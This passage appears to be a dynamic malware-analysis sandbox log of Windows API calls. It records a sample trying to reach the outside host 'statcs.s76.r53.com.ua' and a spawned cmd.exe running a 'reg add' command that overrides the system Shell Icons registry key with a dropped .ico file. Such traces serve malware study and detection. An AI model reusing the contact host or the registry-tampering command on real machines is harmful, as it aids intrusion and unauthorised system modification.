lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] VirtualFree (lpAddress=0x1300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0113.460] FreeLibrary (hLibModule=0x76910000) returned 1 [0113.460] LocalFree (hMem=0x224450) returned 0x0 [0113.461] FreeLibrary (hLibModule=0x76910000) returned 1 [0113.461] LocalFree (hMem=0x224440) returned 0x0 [0113.461] ExitProcess (uExitCode=0x0) Thread: id = 74 os_tid = 0xd9c [0112.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0112.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f8514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0112.926] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1431ffc, cbMultiByte=27, lpWideCharStr=0x191ed38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0112.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0112.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x13ea714, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0112.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0112.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0112.927] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x191fb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x191fbac | out: ppResult=0x191fbac*=0x0) returned 11001 [0113.033] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x191fb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x191fbac | out: ppResult=0x191fbac*=0x0) returned 11001 [0113.033] getnameinfo (in: pSockaddr=0x191fc14, SockaddrLength=0x0, pNodeBuffer=0x134831c, NodeBufferSize=0x401, pServiceBuffer=0x1415124, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="", pServiceBuffer="") returned 10047 [0113.033] htons (hostshort=0x0) returned 0x0 [0113.033] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0113.033] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] SetEvent (hEvent=0x84) returned 1 [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] GetCurrentThreadId () returned 0xd9c [0113.034] CloseHandle (hObject=0xb8) returned 1 [0113.034] RtlExitUserThread (Status=0x0) Thread: id = 76 os_tid = 0xdc0 Process: id = "44" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168a0" os_pid = "0xd8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7397 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7398 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7399 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7400 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 7401 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 7402 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7403 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7404 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7405 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 7406 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 7718 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7719 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7720 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7721 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 7722 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 7723 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 7724 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7725 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7726 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7727 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7728 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7729 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7730 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7731 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 7732 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 7733 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7734 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7735 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 7736 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 7737 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 7738 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 7739 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 7740 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 7741 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 7779 start_va = 0x1350000 end_va = 0x161efff entry_point = 0x1350000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 72 os_tid = 0xd90 [0114.875] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afce4 | out: lpSystemTimeAsFileTime=0x1afce4*(dwLowDateTime=0x81ddc340, dwHighDateTime=0x1d440a9)) [0114.875] GetCurrentProcessId () returned 0xd8c [0114.875] GetCurrentThreadId () returned 0xd90 [0114.875] GetTickCount () returned 0x27454 [0114.875] QueryPerformanceCounter (in: lpPerformanceCount=0x1afcdc | out: lpPerformanceCount=0x1afcdc*=17166417225) returned 1 [0114.876] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0114.876] __set_app_type (_Type=0x1) [0114.876] __p__fmode () returned 0x76b331f4 [0114.876] __p__commode () returned 0x76b331fc [0114.876] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0114.876] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0114.876] GetCurrentThreadId () returned 0xd90 [0114.876] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd90) returned 0x38 [0114.876] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0114.876] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0114.876] SetThreadUILanguage (LangId=0x0) returned 0x409 [0114.877] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.877] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afc74 | out: phkResult=0x1afc74*=0x0) returned 0x2 [0114.877] VirtualQuery (in: lpAddress=0x1afcab, lpBuffer=0x1afc44, dwLength=0x1c | out: lpBuffer=0x1afc44*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0114.877] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afc44, dwLength=0x1c | out: lpBuffer=0x1afc44*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0114.877] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afc44, dwLength=0x1c | out: lpBuffer=0x1afc44*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0114.877] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afc44, dwLength=0x1c | out: lpBuffer=0x1afc44*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0114.877] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afc44, dwLength=0x1c | out: lpBuffer=0x1afc44*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0114.877] GetConsoleOutputCP () returned 0x1b5 [0114.877] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0114.877] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0114.877] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.877] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0114.877] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.877] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0114.877] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.877] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0114.878] _get_osfhandle (_FileHandle=0) returned 0x3 [0114.878] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0114.878] _get_osfhandle (_FileHandle=0) returned 0x3 [0114.878] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0114.878] GetEnvironmentStringsW () returned 0x290388* [0114.878] FreeEnvironmentStringsW (penv=0x290388) returned 1 [0114.878] GetEnvironmentStringsW () returned 0x290388* [0114.878] FreeEnvironmentStringsW (penv=0x290388) returned 1 [0114.878] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aebe4 | out: phkResult=0x1aebe4*=0x40) returned 0x0 [0114.878] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x0, lpData=0x1aebf0*=0x38, lpcbData=0x1aebe8*=0x1000) returned 0x2 [0114.878] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x4, lpData=0x1aebf0*=0x1, lpcbData=0x1aebe8*=0x4) returned 0x0 [0114.878] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x0, lpData=0x1aebf0*=0x1, lpcbData=0x1aebe8*=0x1000) returned 0x2 [0114.878] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x4, lpData=0x1aebf0*=0x0, lpcbData=0x1aebe8*=0x4) returned 0x0 [0114.879] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x4, lpData=0x1aebf0*=0x40, lpcbData=0x1aebe8*=0x4) returned 0x0 [0114.879] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x4, lpData=0x1aebf0*=0x40, lpcbData=0x1aebe8*=0x4) returned 0x0 [0114.879] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x0, lpData=0x1aebf0*=0x40, lpcbData=0x1aebe8*=0x1000) returned 0x2 [0114.879] RegCloseKey (hKey=0x40) returned 0x0 [0114.879] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aebe4 | out: phkResult=0x1aebe4*=0x40) returned 0x0 [0114.879] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x0, lpData=0x1aebf0*=0x40, lpcbData=0x1aebe8*=0x1000) returned 0x2 [0114.879] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x4, lpData=0x1aebf0*=0x1, lpcbData=0x1aebe8*=0x4) returned 0x0 [0114.879] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x0, lpData=0x1aebf0*=0x1, lpcbData=0x1aebe8*=0x1000) returned 0x2 [0114.879] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x4, lpData=0x1aebf0*=0x0, lpcbData=0x1aebe8*=0x4) returned 0x0 [0114.879] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x4, lpData=0x1aebf0*=0x9, lpcbData=0x1aebe8*=0x4) returned 0x0 [0114.879] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x4, lpData=0x1aebf0*=0x9, lpcbData=0x1aebe8*=0x4) returned 0x0 [0114.879] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x0, lpData=0x1aebf0*=0x9, lpcbData=0x1aebe8*=0x1000) returned 0x2 [0114.879] RegCloseKey (hKey=0x40) returned 0x0 [0114.879] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635b [0114.879] srand (_Seed=0x5b88635b) [0114.879] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0\"" [0114.879] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0\"" [0114.879] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0114.879] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x291ae8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0114.880] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.880] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.880] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.880] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0114.880] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0114.880] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0114.880] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0114.880] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0114.880] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0114.880] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0114.880] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0114.880] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0114.880] GetEnvironmentStringsW () returned 0x2924d8* [0114.880] FreeEnvironmentStringsW (penv=0x2924d8) returned 1 [0114.880] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.880] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, 